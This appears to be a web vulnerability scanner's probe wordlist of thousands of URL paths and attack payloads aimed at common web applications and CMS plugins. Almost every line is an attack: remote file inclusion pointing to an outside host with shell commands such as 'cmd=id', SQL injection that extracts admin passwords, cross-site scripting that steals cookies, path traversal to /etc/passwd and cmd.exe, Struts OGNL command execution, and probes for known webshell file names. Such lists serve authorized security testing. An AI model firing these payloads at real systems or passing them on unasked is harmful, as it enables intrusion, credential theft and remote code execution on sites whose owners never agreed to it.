K8big.php
K8diy.php
K8jsp.php
LZVQHo98Ji.jsp
ListRecords.php?lib_dir=http://www.yxlink.com/nvs_test.txt?&cmd=id
Login.aspx?APPSecret=%27%20and%20(select%20convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCHAR(102)%2bCHAR(80)%2bCHAR(87)%2bCHAR(57)%2bCHAR(107)%2bCHAR(77)%2bCHAR(84)%2bCHAR(87))%20FROM%20syscolumns)=1--
Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=http://www.yxlink.com/nvs_test.txt
MAINTAINERS.txt
MOD_forum_fields_parse.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
Mamblog/admin.mamblog.php?cfgfile=http://www.yxlink.com/nvs_test.txt
Mem/dynaform/FileExplorer.htm
Mod_Rewrite_Shop/
MsmMask.exe?mask=/junk334
MyStruts.action?%28%27%5Cu0023_memberAccess[%5C%27allowStaticMethodAccess%5C%27]%27%29%28meh%29=true&%28aaa%29%28%28%27%5Cu0023context[%5C%27xwork.MethodAccessor.denyMethodExecution%5C%27]%5Cu003d%5Cu0023foo%27%29%28%5Cu0023foo%5Cu003dnew%20java.lang.Boolean%28%22false%22%29%29%29&%28asdf%29%28%28%27%5Cu0023rt.exec%28%22id%22%29%27%29%28%5Cu0023rt%5Cu003d@java.lang.Runtime@getRuntime%28%29%29%29=1
NR/System/Access/ManualLogin.asp?REASONTXT=<script>alert(document.cookie);window.open(\x22http://attacker.site.example.com\x22);</SCRIPT>
NULL.printer
NetDetector/middle_help_intro.htm
Net_DNS_PATH/DNS/RR.php?phpdns_basedir=http://www.yxlink.com/nvs_test.txt?
New%20Folder
New%20folder%20(2)
News.asp?click=1&shu=20%201%20as%20NewsID,88888888-1%20as%20title,3%20as%20updatetime,passwd%20as%20click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%20from%20admin%20union%20select%20top%202
NkHbxhRG
NuclearBB/tasks/send_queued_emails.php?root_path=http://www.yxlink.com/nvs_test.txt
OpenFlashChart/open-flash-chart.swf?get-data=(function(){alert(document.domain)})()
OpenSiteAdmin/indexFooter.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/pages/pageHeader.php?path=http://www.yxlink.com/nvs_test.txt?
OpenSiteAdmin/scripts/classes/DatabaseManager.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/FieldManager.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/Filter.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/Filters/SingleFilter.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/Form.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/FormManager.php?path=http://www.yxlink.com/nvs_test.txt%00
OpenSiteAdmin/scripts/classes/LoginManager.php?path=http://www.yxlink.com/nvs_test.txt%00
Orion/IPAM/search.aspx?q=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%27hi%27%29%3C
PDG_Cart/shopper.conf
PHP
PHP/includes/header.inc.php?root=http://www.yxlink.com/nvs_test.txt?
PHP4cp.php
PHPDJ_v05/dj/djpage.php?page=http://www.yxlink.com/nvs_test.txt
PHPJackal.php
PHPspy.php
PMA/
PMA/main.php
PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd
PZIfHV7XEB.cfm
PaTh/index.php?rootpath=http://www.yxlink.com/nvs_test.txt
Page/1,10966,,00.html?var=<script>alert('Vulnerable')</script>
Password
Path_Script/createurl.php?formurl=http://www.yxlink.com/nvs_test.txt
PhotoCart/adminprint.php?admin_folder=http://www.yxlink.com/nvs_test.txt
Picssolution/install/config.php?path=http://www.yxlink.com/nvs_test.txt
Plus/gg/js/ad_dialog.js
Profile
Program%20Files/
README
README.TXT
README.htm
README.md
README.txt
READ_THIS_FIRST.txt
RGboard/include/footer.php?_path[counter]=http://www.yxlink.com/nvs_test.txt?
Rakefile
Read Me.txt
Read_Me.txt
Readme.txt
ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
RestApi
Root
Russian.php
SDEauKYWKl.php
SOLR
SPHERA/login/sm_login_screen.php?error=\x5C\x22><script>alert('Vulnerable')</script>
SPHERA/login/sm_login_screen.php?uid=\x5C\x22><script>alert('Vulnerable')</script>
SPIP-v1-7-2/inc-calcul.php3?squelette_cache=http://www.yxlink.com/nvs_test.txt?
SQL
SQLQHit.asp
SQLServ/sqlbrowse.asp?filepath=c:\x5C&Opt=3
SQuery/lib/gore.php?libpath=http://www.yxlink.com/nvs_test.txt
SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_MEMBER=1+OR+1=1)+UNION+SELECT+ID_MEMBER,+md5(333),null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
SUNWmc/htdocs/
SUNWmc/htdocs/en_US/
SVN
Satk/javascript/class.atkdateattribute.js.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
SazCart/admin/alayouts/default/pages/login.php?_saz[settings][site_url]=http://www.yxlink.com/nvs_test.txt?
SazCart/layouts/default/header.saz.php?_saz[settings][site_dir]=http://www.yxlink.com/nvs_test.txt?
ScriptPage/source/includes/load_forum.php?mfh_root_path=http://www.yxlink.com/nvs_test.txt 
ScriptPath/footers.php?tinybb_footers=http://www.yxlink.com/nvs_test.txt
ScriptPath/index.php?page=http://www.yxlink.com/nvs_test.txt
Script_Path/config.inc.php?_path=http://www.yxlink.com/nvs_test.txt?
Scripts/app_and_readme/navigator/index.php?page=http://www.yxlink.com/nvs_test.txt
Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=http://www.yxlink.com/nvs_test.txt
Search
Secret
ServiceRegistry/HelpSearch.do?searchTerm=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E%3C
SilverStream
SilverStream/Meta/Tables/?access-mode=text
SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator
SiteServer/Knowledge/Default.asp?ctr=\x5C\x22><script>alert('Vulnerable')</script>
Somery/team.php?checkauth=http://www.yxlink.com/nvs_test.txt
Sources/Packages.php?sourcedir=http://www.yxlink.com/nvs_test.txt
Statistik/
Survey/Survey.Htm
T0p.php
TEMP
TMP
TODO
TiVoConnect?Command=QueryContainer&Container=/&Recurse=Yes
TiVoConnect?Command=QueryServer
TopSitesdirectory/help.php?sid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;
TqndNSZZ
Trace.axd
TyzpyetL
Upload
Upload/install.php?skindir=http://www.yxlink.com/nvs_test.txt
User/images/css/css.css
UserCenter/login.aspx
UserCenter/register.aspx
UserFile
UserFiles
UserFiles/1.asp;1(1).jpg
UserFiles/File/1.asp;1(1).jpg
UserFiles/Image/1.asp;1(1).jpg
V29OhYTL
Vagrantfile
Vagrantfile.backup
W2ChNluOes.php
WEB-INF/web.xml
WEBAGENT/CQMGSERV/CF-SINFO.TPF
WINDMAIL.EXE?%20-n%20c:\x5Cboot.ini%
WS_FTP
WebEditor/Authentication/LoginPage.aspx?ReturnUrl=%2fWebEditor%2fDefault.aspx&errMsg=User+is+locked.+Too+many+logon+attempts.\x22><script>alert('XSS-By-Lament')</script>
WebResource.axd?d=
WebResource.axd?d=nvs_test
WebService
Webalizer/
Widgets/Base/Footer.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifContainer.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifRoot.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifRoot2.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifRoot3.php?sys_dir=http://www.yxlink.com/nvs_test.txt
Widgets/Base/widget.BifWarning.php?sys_dir=http://www.yxlink.com/nvs_test.txt
WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://www.yxlink.com/nvs_test.txt?
XYnyVFsk5x.cfm
Xcelerate/LoginPage.html
XhToeuHodL
XhToeuHodL.asp
XhToeuHodL.aspx
XhToeuHodL.cfm
XhToeuHodL.cgi
XhToeuHodL.exe
XhToeuHodL.jhtml
XhToeuHodL.jsp
XhToeuHodL.jspa
XhToeuHodL.nsf
XhToeuHodL.php
XhToeuHodL.phtml
XhToeuHodL.pl
XhToeuHodL.plx
XhToeuHodL.shtml
XhToeuHodL.stm
XmEJ32yz9iNqlduk
YaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>
ZefKif2GYi.cfm
ZeroClipboard.swf
[path]/mybic_server.php?file=http://www.yxlink.com/nvs_test.txt
[path]/previewtheme.php?theme=1&inc_path=http://www.yxlink.com/nvs_test.txt?cmd
\x5C\x22><img%20src=\x5C\x22javascript:alert(document.domain)\x5C\x22>
_
_SQL
__MACOSX
__SQL
_adm
_admin
_administration/securite.php?cfg[document_uri]=http://www.yxlink.com/nvs_test.txt
_awstats/
_basicfunctions.php?DIR=http://www.yxlink.com/nvs_test.txt
_blogadata/include/struct_admin.php?incl_page=http://www.yxlink.com/nvs_test.txt?
_conf/_php-core/common-tpl-vars.php?admindir=http://www.yxlink.com/nvs_test.txt
_connect.php?root=http://www.yxlink.com/nvs_test.txt
_errors
_files
_friendly/core/data/_load.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_friendly/core/data/yaml.inc.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_friendly/core/display/_load.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_friendly/core/support/_load.php?friendly_path=http://www.yxlink.com/nvs_test.txt
_functions.php?prefix=http://www.yxlink.com/nvs_test.txt
_include
_includes/settings.inc.php?approot=http://www.yxlink.com/nvs_test.txt
_install
_layouts
_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X
_layouts/scriptresx.ashx?culture=en-us&name=SP.JSGrid.Res&rev=laygpE0lqaosnkB4iqx6mA%3D%3D&sections=All<script>alert(12345)</script>z
_logs
_mem_bin/auoconfig.asp
_mem_bin/formslogin.asp?\x5C\x22><script>alert('Vulnerable')</script>
_mem_bin/remind.asp
_mmServerScripts/MMHTTPDB.asp
_old
_pages
_private
_source
_sqladm
_src
_test
_tests
_theme/breadcrumb.php?rootBase=http://www.yxlink.com/nvs_test.txt
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/_vti_adm/admin.dll
_vti_bin/_vti_aut/fp30reg.dll?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
_vti_bin/fpcount.exe
_vti_bin/fpcount.exe/
_vti_bin/shtml.exe/junk_nonexistant.exe
_vti_inf.html
_vti_pvt/authors.pwd
_vti_pvt/botinfs.cnf
_vti_pvt/bots.cnf
_vti_pvt/service.cnf
_webalizer/
_wk/wk_lang.php?WK[wkPath]=http://www.yxlink.com/nvs_test.txt
_www
a
a%5c.aspx
a.jsp/<script>alert('Vulnerable')</script>
a.php
a?<script>alert('Vulnerable')</script>
a_security.htm
ab2/Help_C/\x5C@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script> 
abf_js.php?abs_pfad=http://www.yxlink.com/nvs_test.txt?&cmd=id
about.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
about.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
about.php?inc_dir=http://www.yxlink.com/nvs_test.txt
about/?module=../robots.txt&fmodule=7
aboutinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
aboutus.php?type=1%27+aNd+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select+(md5(333))),1,62)))a+from+information_schema.tables+group+by+a)b)+and+%27z%27=%27z
abxaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaeada.php?a=<script>alert(32233333)</script>
acart2_0/admin/error.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/admin/index.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/deliver.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/error.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acart2_0/signin.asp?msg=<script>alert(\x5C\x22test\x5C\x22)</script>
acc.php?page=http://www.yxlink.com/nvs_test.txt
access
access-log
access.log
access/login.php?path_to_root=http://www.yxlink.com/nvs_test.txt
access_log
accesslog
account
account.php?insPath=http://www.yxlink.com/nvs_test.txt
accounts
accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.yxlink.com/nvs_test.txt
accsess/login.php?path_to_root=http://www.yxlink.com/nvs_test.txt
achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
action=chooseDirectory&currentPath='\x22>><script>alert(111)</script>
action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</t extarea><script>alert('XSS Vulnerability')%3B</script>
actions/ipn.php?config[plugin_dir]=http://www.yxlink.com/nvs_test.txt
active.log
active/components/xmlrpc/client.php?c[components]=http://www.yxlink.com/nvs_test.txt
acunetix-wvs-test-for-some-inexistent-file
ad
ad_main.php?_mygamefile=http://www.yxlink.com/nvs_test.txt
add.cgi.php?blog_theme=http://www.yxlink.com/nvs_test.txt
add.php
add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script>
add_link.php?blog_theme=http://www.yxlink.com/nvs_test.txt
add_user.php
addons
addpost_newpoll.php?addpoll=preview&thispath=http://www.yxlink.com/nvs_test.txt
addressbook.php?GLOBALS[basedir]=http://www.yxlink.com/nvs_test.txt?
addressbook.php?\x5C\x22><script>alert(Vulnerable)</script><!--
addressbook/index.php?name=<script>alert('Vulnerable')</script>
addressbook/index.php?surname=<script>alert('Vulnerable')</script>
addsite.php?returnpath=http://www.yxlink.com/nvs_test.txt
addvip.php?msetstr[\x5C\x22PROGSDIR\x5C\x22]=http://www.yxlink.com/nvs_test.txt
addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;
adm/fckeditor
adm/file.cgi?next_file=%2fetc%2fpasswd
adm/file.cgi?next_file=%3Cscript%3Ealert(1)%3C/script%3E
adm/file.cgi?todo=xss&this_file=%3cscript%3ealert(1)%3c/script%3e
adm/krgourl.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
adm/my_statistics.php?DOCUMENT_ROOT=http://www.yxlink.com/nvs_test.txt?
admin
admin-console
admin-serv/tasks/configuration/ViewLog?file=passwd&num=5000&str=&directories=admin-serv%2Flogs%2f..%2f..%2f..%2f..%2f..%2f..%2fetc&id=admin-serv
admin.cgi
admin.htm
admin.html
admin.loudmouth.php?mainframe=http://www.yxlink.com/nvs_test.txt
admin.php
admin.php?Madoa=http://www.yxlink.com/nvs_test.txt?
admin.php?cal_dir=http://www.yxlink.com/nvs_test.txt
admin.php?env_dir=http://www.yxlink.com/nvs_test.txt
admin.php?lang=http://www.yxlink.com/nvs_test.txt
admin.php?m=Theme&a=Edit&path=/index.php
admin.php?module=banlist&curr=1\x22><img/src/onerror=\x22alert(222);&delete=1
admin.php?page=configuration&amp;section=%22%3E%3Cscript%3Ealert%28document.cookie%29; %3C/script%3E
admin.php?page[path]=http://www.yxlink.com/nvs_test.txt?&cmd=ls
admin.php?submit=submit&form_include_template=http://www.yxlink.com/nvs_test.txt
admin/
admin/?kerberos=onmouseover=alert(1)&kerberos
admin/Category_GetSearch.aspx?key=%27%20and%201=2%20union%20select%201,2,3,4,5,888888888-1%20from%20[t_admin]--
admin/FCKeditor
admin/FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
admin/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
admin/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F
admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=http://www.yxlink.com/nvs_test.txt
admin/PLUGINs/NP_UserSharing.php?DIR_ADMIN=http://www.yxlink.com/nvs_test.txt?admin
admin/ST_countries.php?include_path=http://www.yxlink.com/nvs_test.txt?
admin/ST_platforms.php?include_path=http://www.yxlink.com/nvs_test.txt?
admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,8888888899999999-1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1
admin/addentry.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/addentry.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
admin/addons/archive/archive.php?adminfolder=http://www.yxlink.com/nvs_test.txt
admin/admin.php?page=yourcode.txt?&cmd=id
admin/admin.php?path=http://www.yxlink.com/nvs_test.txt
admin/admin.php?site_url=http://www.yxlink.com/nvs_test.txt
admin/admin.php?vwar_root=http://www.yxlink.com/nvs_test.txt
admin/admin_cash.php?setmodules=1&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/admin_forgotten_password.php?root_folder_path=http://www.yxlink.com/nvs_test.txt
admin/admin_news_bot.php?root_path=http://www.yxlink.com/nvs_test.txt?
admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/admin_topic_action_logging.php?setmodules=pagestart&phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/admin_users.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
admin/airline-edit.php?fid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
admin/auth.php?xcart_dir=http://www.yxlink.com/nvs_test.txt
admin/auth/secure.php?cfgProgDir=http://www.yxlink.com/nvs_test.txt?
admin/autoclose.php?subd=http://www.yxlink.com/nvs_test.txt
admin/autoprompter.php?CONFIG[BASE_PATH]=http://www.yxlink.com/nvs_test.txt
admin/bin/patch.php?INSTALL_FOLDER=http://www.yxlink.com/nvs_test.txt
admin/browse.asp?FilePath=c:\x5C&Opt=2&level=0
admin/catagory.php?language=http://www.yxlink.com/nvs_test.txt
admin/ckeditor
admin/classes/pear/OLE/PPS.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/OLE/PPS/File.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/OLE/PPS/Root.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/BIFFwriter.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Format.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Parser.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Workbook.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/classes/pear/Spreadsheet/Excel/Writer/Worksheet.php?homedir=http://www.yxlink.com/nvs_test.txt
admin/cms/htmltags.php?datei=./sec/data.php
admin/code/index.php?load_page=http://www.yxlink.com/nvs_test.txt
admin/comment.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/common-menu.php?CONF[local_path]=http://www.yxlink.com/nvs_test.txt
admin/common.inc.php?base_path=http://www.yxlink.com/nvs_test.txt
admin/config.php?display=did&didfilter=&extdisplay=12%22%20union%20select%20username,md5(333),sections,%221%22,%222%22,%223%22,%224%22,%225%22,%226%22,%227%22,%228%22,%229%22,%2210%22,%2211%22,%2212%22%20from%20ampusers%20where%20%22%22=%22
admin/config_settings.tpl.php?include_path=http://www.yxlink.com/nvs_test.txt?&cmd=id
admin/customer-edit.php?cid=-2+union+select+1,2,3,md5(333),5,6,7,8+from+information_schema.tables+where+table_schema=database()--
admin/db.php?dump_sql=1
admin/directory.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/eWebEditorNet/admin/login.aspx
admin/eWebEditorNet/admin_login.aspx
admin/editor/admin/login.aspx
admin/editor/admin/login.php
admin/editor/admin_login.asp
admin/editor/admin_login.aspx
admin/editor/admin_login.php
admin/editor/login.asp
admin/elmah.axd
admin/eweb/admin/login.asp
admin/eweb/admin/login.aspx
admin/eweb/admin/login.jsp
admin/eweb/admin/login.php
admin/eweb/admin_login.asp
admin/eweb/admin_login.aspx
admin/eweb/admin_login.jsp
admin/eweb/admin_login.php
admin/ewebeditor/admin/login.aspx
admin/ewebeditor/admin/login.php
admin/ewebeditor/admin_login.asp
admin/ewebeditor/admin_login.aspx
admin/ewebeditor/admin_login.php
admin/ewebeditor/login.asp
admin/exec.php3?cmd=cat%20/etc/passwd
admin/exec.php3?cmd=dir%20c:\x5C\x5C
admin/exec.php3?cmd=id
admin/frontpage_right.php?loadadminpage=http://www.yxlink.com/nvs_test.txt
admin/header.php?loc=http://www.yxlink.com/nvs_test.txt
admin/image/login.css
admin/images/css.css
admin/inc/add.php?format_menue=http://www.yxlink.com/nvs_test.txt
admin/inc/change_action.php?format_menue=http://www.yxlink.com/nvs_test.txt
admin/include/common.php?commonIncludePath=http://www.yxlink.com/nvs_test.txt?
admin/include/header.php?repertoire=http://www.yxlink.com/nvs_test.txt
admin/include/lib.module.php?mod_root=http://www.yxlink.com/nvs_test.txt
admin/includes/admin_header.php?level=http://www.yxlink.com/nvs_test.txt
admin/includes/author_panel_header.php?level=http://www.yxlink.com/nvs_test.txt
admin/includes/header.php?bypass_installed=1&secure_page_path=http://www.yxlink.com/nvs_test.txt%00
admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.yxlink.com/nvs_test.txt?
admin/index.asp
admin/index.php?act=login&username='%20UNION%20SELECT%20id,name, '3858f62230ac3c915f300c664312c63f',email,notify,md5(333),session%20FROM%20 pafaq_admins%20WHERE%201/*&password=foobar
admin/index.php?path_to_script=http://www.yxlink.com/nvs_test.txt?&cmd=ls
admin/index.php?pg=http://www.yxlink.com/nvs_test.txt?
admin/index.php?xtrphome=http://www.yxlink.com/nvs_test.txt
admin/index1.asp
admin/index_sitios.php?_VIEW=http://www.yxlink.com/nvs_test.txt
admin/js/tiny_mce
admin/js/tinymce
admin/lib_action_step.php?GLOBALS[CLASS_PATH]=http://www.yxlink.com/nvs_test.txt
admin/login.jsp
admin/login.php/\x22><script>alert(133)</script>
admin/login.php?absolute_path=http://www.yxlink.com/nvs_test.txt
admin/login.php?path=\x5C\x22></form><form name=a><input name=i value=XSS>&lt;script>alert('Vulnerable')</script>
admin/mysql/
admin/mysql/main.php
admin/news.admin.php?path_to_script=http://www.yxlink.com/nvs_test.txt?&cmd=ls
admin/news.php?language=http://www.yxlink.com/nvs_test.txt
admin/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
admin/phpinfo.php
admin/phpmyadmin/
admin/phpmyadmin/main.php
admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>
admin/plugins/Online_Users/main.php?GLOBALS[PT_Config][dir][data]=http://www.yxlink.com/nvs_test.txt
admin/pma/
admin/pma/main.php
admin/release
admin/scripts/fckeditor
admin/scripts/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
admin/sendmsg.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/servlet/org.apache.catalina.servlets.DefaultServlet/index.jsp
admin/setup/level2.php?dir=http://www.yxlink.com/nvs_test.txt
admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\x5C\x22><script>alert(document.cookie)</script>
admin/system.php3?cmd=cat%20/etc/passwd
admin/system.php3?cmd=dir%20c:\x5C\x5C
admin/system/config/conf-activation.php?site_path=http://www.yxlink.com/nvs_test.txt
admin/system/include.php?skindir=http://www.yxlink.com/nvs_test.txt
admin/system/include.php?start=1&skindir=http://www.yxlink.com/nvs_test.txt
admin/system/menu/item.php?site_path=http://www.yxlink.com/nvs_test.txt
admin/system/modules/conf_modules.php?site_path=http://www.yxlink.com/nvs_test.txt
admin/templates/default/index.tpl.php
admin/templates/template_thumbnail.php?thumb_template=http://www.yxlink.com/nvs_test.txt
admin/testing/tests/0004_init_urls.php?init_path=http://www.yxlink.com/nvs_test.txt
admin/testing/tests/0004_init_urls.php?init_path=http://www.yxlink.com/nvs_test.txt?&
admin/themes.php?config[installdir]=http://www.yxlink.com/nvs_test.txt
admin/tiny_mce
admin/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
admin/tinymce
admin/tools/utf8conversion/index.php?path=http://www.yxlink.com/nvs_test.txt?
admin/ueueBrowse/example.A?view=rss&feedType=<script>alert(111)</script>
admin/upload/phpThumb.php?src=./index.php&fltr[]=blur|5;echo+082119f75623eb7abd7bf357698ff66c>cache/acunetix;
admin/user_user.php?language=http://www.yxlink.com/nvs_test.txt
admin/webeditor/admin_login.asp
admin0
admin1
admin868/
admin_
admin_aspcms/_content/_tag/aspcms_tag.asp
admin_aspcms/index.asp
admin_files
admin_login
admin_logon
adminconsole
admincp/auth/checklogin.php?cfgProgDir=http://www.yxlink.com/nvs_test.txt
admincp/auth/secure.php?cfgProgDir=http://www.yxlink.com/nvs_test.txt
admincp/cronadmin.php?nextitem[filename]=http://www.yxlink.com/nvs_test.txt
admincp/diagnostic.php?api[classname]=http://www.yxlink.com/nvs_test.txt
admincp/diagnostic.php?match[0]=http://www.yxlink.com/nvs_test.txt
admincp/plugin.php?safeid=http://www.yxlink.com/nvs_test.txt
adminfiles
adminhead.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
admini/admin.php?INC=http://www.yxlink.com/nvs_test.txt?
admini/index.php?INC=http://www.yxlink.com/nvs_test.txt?
administer/
administration
administrative
administrator
administrator.cgi
administrator/
administrator/admin.php?site_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_chronocontact/excelwriter/PPS.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt?
administrator/components/com_clickheat/Recly/Clickheat/Cache.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/includes/heatmap/_main.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/includes/heatmap/main.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/includes/overview/main.php?mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
administrator/components/com_clickheat/install.clickheat.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.yxlink.com/nvs_test.txt
administrator/components/com_competitions/includes/competitions/add.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
administrator/components/com_competitions/includes/competitions/competitions.php?GLOBALS[mosConfig_absolute_path]=http://www.yxlink.com/nvs_test.txt
